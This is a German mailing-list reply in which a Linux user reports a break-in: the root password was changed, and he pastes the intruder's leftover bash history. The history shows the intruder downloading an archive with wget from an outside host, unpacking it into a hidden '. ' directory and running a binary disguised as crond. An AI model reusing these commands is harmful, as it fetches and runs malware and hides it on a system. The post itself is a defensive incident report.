Re: Veränderte Dateien finden
Peter Blancke wrote:
> Dann beschreibe uns doch einmal genau, was vorgefallen ist und wie
> Du es bemerkt hast. Solange werte ich Deine Aussage zu chkrootkit
> als Nullaussage. Ferner: Kennst Du die (in Debian nicht vorhandene)
> Software rkhunter?
Das root-Passwort wurde geändert. Die Bash-History war anscheinend nicht
gelöscht, und sie enthält folgende letzte Einträge:
uptime
uname -a
passwd
cd /dev/shm
wget www.freewebtown.com/aproape/cornelirina.tgz
tar zxvf cornelirina.tgz
cd '. '
./crond
./crond
cd /var/tmp
wget www.freewebtown.com/aproape/cornelirina.tgz
tar zxvf cornelirina.tgz
cd '. '
./crond
w
ps x
cd /var/tmp
wget www.freewebtown.com/aproape/cornelirina.tgz
tar zxvf cornelirina.tgz
cd '. '
./crond
Viele Grüße Jan
Reply to: